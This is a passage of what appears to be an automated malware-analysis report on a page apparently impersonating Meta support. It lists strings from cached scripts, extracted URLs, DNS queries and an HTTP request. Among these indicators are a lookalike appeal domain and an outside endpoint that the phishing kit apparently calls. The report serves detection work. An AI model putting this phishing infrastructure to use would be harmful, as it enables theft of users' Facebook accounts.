data-v-cb73a628>Developers</a><a href="https://www.facebook.com/careers" target="_blank" data-v-cb73a628>Careers</a><a href="https://www.facebook.com/privacy/policy/?entry_point=data_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Privacy</a><a href="https://www.facebook.com/privacy/policies/cookies/?entry_point=cookie_policy_redirect&entry=0" target="_blank" data-v-cb73a628>Cookies</a><a href="https://www.facebook.com/policies_center" target="_blank" data-v-cb73a628>Terms</a><a href="https://business.facebook.com/business/help" target="_blank" data-v-cb73a628>Help Center</a></div><div data-v-cb73a628><a href="/" data-v-cb73a628><b data-v-cb73a628>English (US)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>English (UK)</b></a><a href="/" data-v-cb73a628><b data-v-cb73a628>Espa equals www.twitter.com (Twitter)
Source: chromecache_210.1.dr	String found in binary or memory: __d("Chromedome",["fbt"],(function(a,b,c,d,e,f,g,h){function a(a){if(top!==window\|\|document.domain==null\|\|!/(^\|\.)facebook\.(com\|sg)$/.test(document.domain))return;a=h._("Stop!");var b=h._("This is a browser feature intended for developers. If someone told you to copy and paste something here to enable a Facebook feature or \"hack\" someone's account, it is a scam and will give them access to your Facebook account."),c=h._("See {url} for more information.",[h._param("url","https://www.facebook.com/selfxss")]);if(window.chrome\|\|window.safari){var d="font-family:helvetica; font-size:20px; ";[[a,d+"font-size:50px; font-weight:bold; color:red; -webkit-text-stroke:1px black;"],[b,d],[c,d],["",""]].map(function(a){window.setTimeout(console.log.bind(console,"\n%c"+a[0].toString(),a[1]))})}else{a=[""," .d8888b. 888 888","d88P Y88b 888 888","Y88b. 888 888",' "Y888b. 888888 .d88b. 88888b. 888',' "Y88b. 888 d88""88b 888 "88b 888',' "888 888 888 888 888 888 Y8P',"Y88b d88P Y88b. Y88..88P 888 d88P",' "Y8888P" "Y888 "Y88P" 88888P" 888'," 888"," 888"," 888"];d=(""+b.toString()).match(/.{35}.+?\s+\|.+$/g);if(d!=null){b=Math.floor(Math.max(0,(a.length-d.length)/2));for(var e=0;e<a.length\|\|e<d.length;e++){var f=a[e];a[e]=f+new Array(45-f.length).join(" ")+(d[e-b]\|\|"")}}console.log("\n\n\n"+a.join("\n")+"\n\n"+c.toString()+"\n");return}}g.start=a}),98); equals www.facebook.com (Facebook)
Source: chromecache_232.1.dr	String found in binary or memory: __d("CometCookieConsent2023Q1OtherCompanies.react",["CometCookieConsentModalStringsUpdated","CometCookieConsentSectionAccordion.react","CometCookieConsentUtils.react","CometListCellText.react","TetraText.react","react"],(function(a,b,c,d,e,f,g){"use strict";var h=d("react");function a(){return h.jsxs("div",{className:"xua58t2 xx6bls6",children:[h.jsx("div",{className:"x9orja2",children:h.jsx(c("TetraText.react"),{type:"headlineEmphasized2",children:d("CometCookieConsentModalStringsUpdated").COOKIES_FROM_OTHER_COMPANIES_SECTION_HEADER})}),h.jsx("div",{className:"x1cnzs8",children:h.jsx(c("TetraText.react"),{type:"body3",children:d("CometCookieConsentModalStringsUpdated").getCookiesFromOtherCompaniesSubHeader(o)})}),h.jsx("div",{className:"x1cnzs8",children:h.jsx(c("CometCookieConsentSectionAccordion.react"),{content:j,sectionTitle:i})}),h.jsx("div",{children:h.jsx(c("CometCookieConsentSectionAccordion.react"),{content:l,sectionTitle:k})}),h.jsx("div",{children:h.jsx(c("CometCookieConsentSectionAccordion.react"),{content:n,sectionTitle:m})})]})}a.displayName=a.name+" [from "+f.id+"]";var i=h.jsx(c("CometListCellText.react"),{headline:h.jsx(c("TetraText.react"),{type:"headlineEmphasized3",children:d("CometCookieConsentModalStringsUpdated").HOW_WE_USE_THESE_COOKIES})}),j=h.jsxs("div",{style:{marginLeft:10},children:[h.jsx("div",{style:{paddingBottom:10,paddingTop:10},children:h.jsx(c("TetraText.react"),{type:"body3",children:d("CometCookieConsentModalStringsUpdated").HOW_WE_USE_THESE_COOKIES_INTRO})}),h.jsx(d("CometCookieConsentUtils.react").CometConsentListBullets,{list:[d("CometCookieConsentModalStringsUpdated").HOW_WE_USE_THESE_COOKIES_ITEM_1,d("CometCookieConsentModalStringsUpdated").HOW_WE_USE_THESE_COOKIES_ITEM_2,d("CometCookieConsentModalStringsUpdated").HOW_WE_USE_THESE_COOKIES_ITEM_3]})]}),k=h.jsx(c("CometListCellText.react"),{headline:h.jsx(c("TetraText.react"),{type:"headlineEmphasized3",children:d("CometCookieConsentModalStringsUpdated").IF_ALLOW_THESE_COOKIES})}),l=h.jsx("div",{style:{marginLeft:10},children:h.jsx(d("CometCookieConsentUtils.react").CometConsentListBullets,{list:[d("CometCookieConsentModalStringsUpdated").IF_ALLOW_THESE_COOKIES_ITEM_1,d("CometCookieConsentModalStringsUpdated").IF_ALLOW_THESE_COOKIES_ITEM_2,d("CometCookieConsentModalStringsUpdated").IF_ALLOW_THESE_COOKIES_ITEM_3]})}),m=h.jsx(c("CometListCellText.react"),{headline:h.jsx(c("TetraText.react"),{type:"headlineEmphasized3",children:d("CometCookieConsentModalStringsUpdated").IF_DONT_ALLOW_THESE_COOKIES})}),n=h.jsx("div",{style:{marginLeft:10},children:h.jsx(d("CometCookieConsentUtils.react").CometConsentListBullets,{list:[d("CometCookieConsentModalStringsUpdated").IF_DONT_ALLOW_THESE_COOKIES_ITEM_1,d("CometCookieConsentModalStringsUpdated").IF_DONT_ALLOW_THESE_COOKIES_ITEM_2]})}),o="https://www.facebook.com/privacy/policies/cookies/?annotations[0]=explanation%2F3_companies_list";g.CometCookieConsent2023Q1OtherCompanies=a}),98); equals www.facebook.com (Facebook)
Source: chromecache_276.1.dr	String found in binary or memory: __d("CometLegalFooterMoreMenu.react",["fbt","CometMenu.react","CometMenuItem.react","react"],(function(a,b,c,d,e,f,g,h){"use strict";var i=d("react");function a(a){a=a.isHelpCenter;a=a===void 0?!1:a;return i.jsxs(c("CometMenu.react"),{withArrow:!0,children:[i.jsx(c("CometMenuItem.react"),{href:"https://about.meta.com/"+(a?"?utm_source=help-center&utm_medium=referral":""),primaryText:h._("About")}),i.jsx(c("CometMenuItem.react"),{href:"https://www.facebook.com/careers/?ref=pf",primaryText:h._("Careers")}),i.jsx(c("CometMenuItem.react"),{href:"https://developers.facebook.com/?ref=pf",primaryText:h._("Developers")}),i.jsx(c("CometMenuItem.react"),{href:"https://www.facebook.com/help/?ref=pf",primaryText:h._("Help")})]})}a.displayName=a.name+" [from "+f.id+"]";g["default"]=a}),98); equals www.facebook.com (Facebook)
Source: chromecache_232.1.dr	String found in binary or memory: __d("FacebookCookieConsentCustomization",["fbt","ix","JSResourceForInteraction","XCookiesPolicyControllerRouteBuilder","isBaseline4EnabledForLoggedOut","isCNILEnabledForLoggedOut","lazyLoadComponent"],(function(a,b,c,d,e,f,g,h,i){"use strict";var j=c("lazyLoadComponent")(c("JSResourceForInteraction")("FacebookCometCookieConsentDialogDataSettings.react").__setRef("FacebookCookieConsentCustomization"));a=function(){var a,b,d,e=null;c("isBaseline4EnabledForLoggedOut")()\|\|c("isCNILEnabledForLoggedOut")()?(b=i("1954651"),d=i("1954649"),e=h._("More options")):(b=i("856481"),d=i("856481"),e=h._("Manage Data Settings"));a=(a=(a=c("XCookiesPolicyControllerRouteBuilder").buildUri({}).getQualifiedUri())==null?void 0:(a=a.setDomain("www.facebook.com"))==null?void 0:a.toString())!=null?a:"";return{essentialCookiesOnly:!1,faviconDark:d,faviconLight:b,policyUrl:a,productName:"FACEBOOK",secondaryAction:{label:e,viewReference:j}}};b=a;g["default"]=b}),98); equals www.facebook.com (Facebook)

Source: chromecache_276.1.dr	String found in binary or memory: https://about.meta.com/
Source: chromecache_225.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.0/checkboxgroup
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.0/radiogroup
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.3/
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.3/aria-dialog-name
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.4/definition-list
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.4/list
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/3.4/listitem
Source: chromecache_232.1.dr	String found in binary or memory: https://dequeuniversity.com/rules/axe/4.2/heading-order
Source: chromecache_232.1.dr	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTML/Attributes/rel
Source: chromecache_232.1.dr	String found in binary or memory: https://fb.workplace.com/groups/cometeng/permalink/777450152748974/
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/CometDarkMode
Source: chromecache_284.1.dr	String found in binary or memory: https://fburl.com/comet_preloading
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/dialog-provider).
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/redblock/rules
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/wiki/m19zmtlh
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/wiki/wecsb69s
Source: chromecache_232.1.dr	String found in binary or memory: https://fburl.com/wiki/xrzohrqb
Source: chromecache_218.1.dr	String found in binary or memory: https://getbootstrap.com/)
Source: chromecache_218.1.dr	String found in binary or memory: https://github.com/twbs/bootstrap/blob/main/LICENSE)
Source: chromecache_232.1.dr	String found in binary or memory: https://optout.aboutads.info/
Source: chromecache_225.1.dr	String found in binary or memory: https://picamargarita.live/api/fetch/ban
Source: chromecache_275.1.dr	String found in binary or memory: https://pusher.com/
Source: chromecache_253.1.dr	String found in binary or memory: https://scontent.xx.fbcdn.net/hads-ak-prn2/1487645_6012475414660_1439393861_n.png
Source: chromecache_232.1.dr	String found in binary or memory: https://support.google.com/chrome/answer/95647
Source: chromecache_232.1.dr	String found in binary or memory: https://www.instagram.com/accounts/edit/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/dimsum/geo/page-template-1/code/746943129137038
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/dimsum/geo/colorsv2/Geodesic/usages/?theme=GeodesicColorSystemThem
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/dimsum/geo/page/213355643179002/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/dimsum/geo/page/2804322802968504/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/dimsum/geo/page/2804322802968504/code/526592798178784/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/dimsum/geo/page/288287605465081/
Source: chromecache_240.1.dr, chromecache_274.1.dr	String found in binary or memory: https://www.internalfb.com/intern/invariant/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/uidocs/engineering/430902554298754/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/uidocs/engineering/436811440344449/?ref=bunny
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/uidocs/engineering/575149539863789/
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/uidocs/engineering/822776138156929
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/wiki/Dolly/Accessibility/Common_Accessibility_Issues_In_Dolly/link
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/wiki/Redblock/Rules/#a-widget-must-not-use-it
Source: chromecache_232.1.dr	String found in binary or memory: https://www.internalfb.com/intern/wiki/Redblock/Rules/#comet-button-tap-target
Source: chromecache_276.1.dr	String found in binary or memory: https://www.whatsapp.com/legal/cookies/
Source: chromecache_276.1.dr	String found in binary or memory: https://www.workplace.com/legal/FB_Work_Cookies
Source: chromecache_276.1.dr	String found in binary or memory: https://www.workplace.com/legal/WP_Work_Cookies
Source: chromecache_232.1.dr	String found in binary or memory: https://www.youronlinechoices.com/
Source: chromecache_232.1.dr	String found in binary or memory: https://youradchoices.ca/

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 15, 2023 19:26:23.729157925 CEST	192.168.2.4	8.8.8.8	0xef96	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:23.751256943 CEST	192.168.2.4	8.8.8.8	0x3fd3	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:24.681689024 CEST	192.168.2.4	8.8.8.8	0x1be	Standard query (0)	meta-support-appeal-121990471.web.app	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:24.682892084 CEST	192.168.2.4	8.8.8.8	0x9444	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.063560963 CEST	192.168.2.4	8.8.8.8	0xf750	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.704154968 CEST	192.168.2.4	8.8.8.8	0xc86e	Standard query (0)	unpkg.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:26.092946053 CEST	192.168.2.4	8.8.8.8	0x40c4	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.246556044 CEST	192.168.2.4	8.8.8.8	0x5872	Standard query (0)	ws-eu.pusher.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:29.580099106 CEST	192.168.2.4	8.8.8.8	0x6211	Standard query (0)	sockjs-eu.pusher.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:41.908356905 CEST	192.168.2.4	8.8.8.8	0x959b	Standard query (0)	picamargarita.live	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:57.263289928 CEST	192.168.2.4	8.8.8.8	0x4357	Standard query (0)	business.facebook.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:58.876008987 CEST	192.168.2.4	8.8.8.8	0x6874	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:00.573668957 CEST	192.168.2.4	8.8.8.8	0x3456	Standard query (0)	static.xx.fbcdn.net	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:01.135046959 CEST	192.168.2.4	8.8.8.8	0x85cd	Standard query (0)	facebook.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.754535913 CEST	192.168.2.4	8.8.8.8	0x284b	Standard query (0)	unpkg.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.314448118 CEST	192.168.2.4	8.8.8.8	0x34fe	Standard query (0)	www.facebook.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.316596031 CEST	192.168.2.4	8.8.8.8	0x91d1	Standard query (0)	static.xx.fbcdn.net	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.741190910 CEST	192.168.2.4	8.8.8.8	0x5638	Standard query (0)	unpkg.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.743705988 CEST	192.168.2.4	8.8.8.8	0x7f39	Standard query (0)	meta-support-appeal-121990471.web.app	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:37.348299026 CEST	192.168.2.4	8.8.8.8	0xa592	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:39.687294006 CEST	192.168.2.4	8.8.8.8	0x7fcb	Standard query (0)	sockjs-eu.pusher.com	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:48.470164061 CEST	192.168.2.4	8.8.8.8	0x2c0f	Standard query (0)	scontent.xx.fbcdn.net	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 15, 2023 19:26:23.770708084 CEST	8.8.8.8	192.168.2.4	0x3fd3	No error (0)	accounts.google.com		172.217.16.173	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:23.782958984 CEST	8.8.8.8	192.168.2.4	0xef96	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:23.782958984 CEST	8.8.8.8	192.168.2.4	0xef96	No error (0)	clients.l.google.com		142.251.36.174	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:24.711747885 CEST	8.8.8.8	192.168.2.4	0x9444	No error (0)	www.google.com		172.217.16.164	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:24.723529100 CEST	8.8.8.8	192.168.2.4	0x1be	No error (0)	meta-support-appeal-121990471.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.078228951 CEST	8.8.8.8	192.168.2.4	0xf750	No error (0)	www.google.com		172.217.16.164	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.729417086 CEST	8.8.8.8	192.168.2.4	0xc86e	No error (0)	unpkg.com		104.16.125.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.729417086 CEST	8.8.8.8	192.168.2.4	0xc86e	No error (0)	unpkg.com		104.16.124.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.729417086 CEST	8.8.8.8	192.168.2.4	0xc86e	No error (0)	unpkg.com		104.16.122.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.729417086 CEST	8.8.8.8	192.168.2.4	0xc86e	No error (0)	unpkg.com		104.16.126.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:25.729417086 CEST	8.8.8.8	192.168.2.4	0xc86e	No error (0)	unpkg.com		104.16.123.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:26.121941090 CEST	8.8.8.8	192.168.2.4	0x40c4	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:26.121941090 CEST	8.8.8.8	192.168.2.4	0x40c4	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:26.121941090 CEST	8.8.8.8	192.168.2.4	0x40c4	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:26.121941090 CEST	8.8.8.8	192.168.2.4	0x40c4	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	ws-eu.pusher.com	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		54.76.231.252	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		54.76.82.78	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		54.194.153.12	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		99.80.98.203	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		34.251.254.157	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		52.16.150.221	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		34.251.40.40	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:27.268434048 CEST	8.8.8.8	192.168.2.4	0x5872	No error (0)	socket-eu-ingress-1850214078.eu-west-1.elb.amazonaws.com		54.195.8.17	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:29.609008074 CEST	8.8.8.8	192.168.2.4	0x6211	No error (0)	sockjs-eu.pusher.com	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:29.609008074 CEST	8.8.8.8	192.168.2.4	0x6211	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.212.57.111	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:29.609008074 CEST	8.8.8.8	192.168.2.4	0x6211	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.214.105.39	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:29.609008074 CEST	8.8.8.8	192.168.2.4	0x6211	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.211.192.36	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:41.944035053 CEST	8.8.8.8	192.168.2.4	0x959b	No error (0)	picamargarita.live		199.188.200.183	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:57.298635960 CEST	8.8.8.8	192.168.2.4	0x4357	No error (0)	business.facebook.com	star.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:57.298635960 CEST	8.8.8.8	192.168.2.4	0x4357	No error (0)	star.facebook.com	star.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:57.298635960 CEST	8.8.8.8	192.168.2.4	0x4357	No error (0)	star.c10r.facebook.com		157.240.17.17	A (IP address)	IN (0x0001)	false
May 15, 2023 19:26:58.896483898 CEST	8.8.8.8	192.168.2.4	0x6874	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:26:58.896483898 CEST	8.8.8.8	192.168.2.4	0x6874	No error (0)	star-mini.c10r.facebook.com		157.240.17.35	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:00.603626013 CEST	8.8.8.8	192.168.2.4	0x3456	No error (0)	static.xx.fbcdn.net	scontent.xx.fbcdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:27:00.603626013 CEST	8.8.8.8	192.168.2.4	0x3456	No error (0)	scontent.xx.fbcdn.net		157.240.17.15	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:01.161554098 CEST	8.8.8.8	192.168.2.4	0x85cd	No error (0)	facebook.com		157.240.17.35	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.780654907 CEST	8.8.8.8	192.168.2.4	0x284b	No error (0)	unpkg.com		104.16.126.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.780654907 CEST	8.8.8.8	192.168.2.4	0x284b	No error (0)	unpkg.com		104.16.122.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.780654907 CEST	8.8.8.8	192.168.2.4	0x284b	No error (0)	unpkg.com		104.16.125.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.780654907 CEST	8.8.8.8	192.168.2.4	0x284b	No error (0)	unpkg.com		104.16.123.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:05.780654907 CEST	8.8.8.8	192.168.2.4	0x284b	No error (0)	unpkg.com		104.16.124.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.348582983 CEST	8.8.8.8	192.168.2.4	0x34fe	No error (0)	www.facebook.com	star-mini.c10r.facebook.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:27:29.348582983 CEST	8.8.8.8	192.168.2.4	0x34fe	No error (0)	star-mini.c10r.facebook.com		157.240.17.35	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.351306915 CEST	8.8.8.8	192.168.2.4	0x91d1	No error (0)	static.xx.fbcdn.net	scontent.xx.fbcdn.net		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:27:29.351306915 CEST	8.8.8.8	192.168.2.4	0x91d1	No error (0)	scontent.xx.fbcdn.net		157.240.17.15	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.763982058 CEST	8.8.8.8	192.168.2.4	0x7f39	No error (0)	meta-support-appeal-121990471.web.app		199.36.158.100	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.776626110 CEST	8.8.8.8	192.168.2.4	0x5638	No error (0)	unpkg.com		104.16.122.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.776626110 CEST	8.8.8.8	192.168.2.4	0x5638	No error (0)	unpkg.com		104.16.126.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.776626110 CEST	8.8.8.8	192.168.2.4	0x5638	No error (0)	unpkg.com		104.16.124.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.776626110 CEST	8.8.8.8	192.168.2.4	0x5638	No error (0)	unpkg.com		104.16.123.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:29.776626110 CEST	8.8.8.8	192.168.2.4	0x5638	No error (0)	unpkg.com		104.16.125.175	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:37.368514061 CEST	8.8.8.8	192.168.2.4	0xa592	No error (0)	api.ipify.org	api4.ipify.org		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:27:37.368514061 CEST	8.8.8.8	192.168.2.4	0xa592	No error (0)	api4.ipify.org		104.237.62.211	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:37.368514061 CEST	8.8.8.8	192.168.2.4	0xa592	No error (0)	api4.ipify.org		173.231.16.77	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:37.368514061 CEST	8.8.8.8	192.168.2.4	0xa592	No error (0)	api4.ipify.org		64.185.227.155	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:39.707506895 CEST	8.8.8.8	192.168.2.4	0x7fcb	No error (0)	sockjs-eu.pusher.com	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 15, 2023 19:27:39.707506895 CEST	8.8.8.8	192.168.2.4	0x7fcb	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.211.192.36	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:39.707506895 CEST	8.8.8.8	192.168.2.4	0x7fcb	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.212.57.111	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:39.707506895 CEST	8.8.8.8	192.168.2.4	0x7fcb	No error (0)	k8s-channels-sockjs-03703674e7-9ed60c588200ab0f.elb.eu-west-1.amazonaws.com		52.214.105.39	A (IP address)	IN (0x0001)	false
May 15, 2023 19:27:48.497011900 CEST	8.8.8.8	192.168.2.4	0x2c0f	No error (0)	scontent.xx.fbcdn.net		157.240.17.15	A (IP address)	IN (0x0001)	false

Timestamp	kBytes transferred	Direction	Data
2023-05-15 17:26:25 UTC	0	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
2023-05-15 17:26:25 UTC	0	OUT	Data Raw: 20 Data Ascii:
2023-05-15 17:26:25 UTC	2	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 15 May 2023 17:26:25 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: script-src 'report-sample' 'nonce-tC-QXCI4cMIgAhzMpv6w6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Cross-Origin-Opener-Policy: same-origin Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version= Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
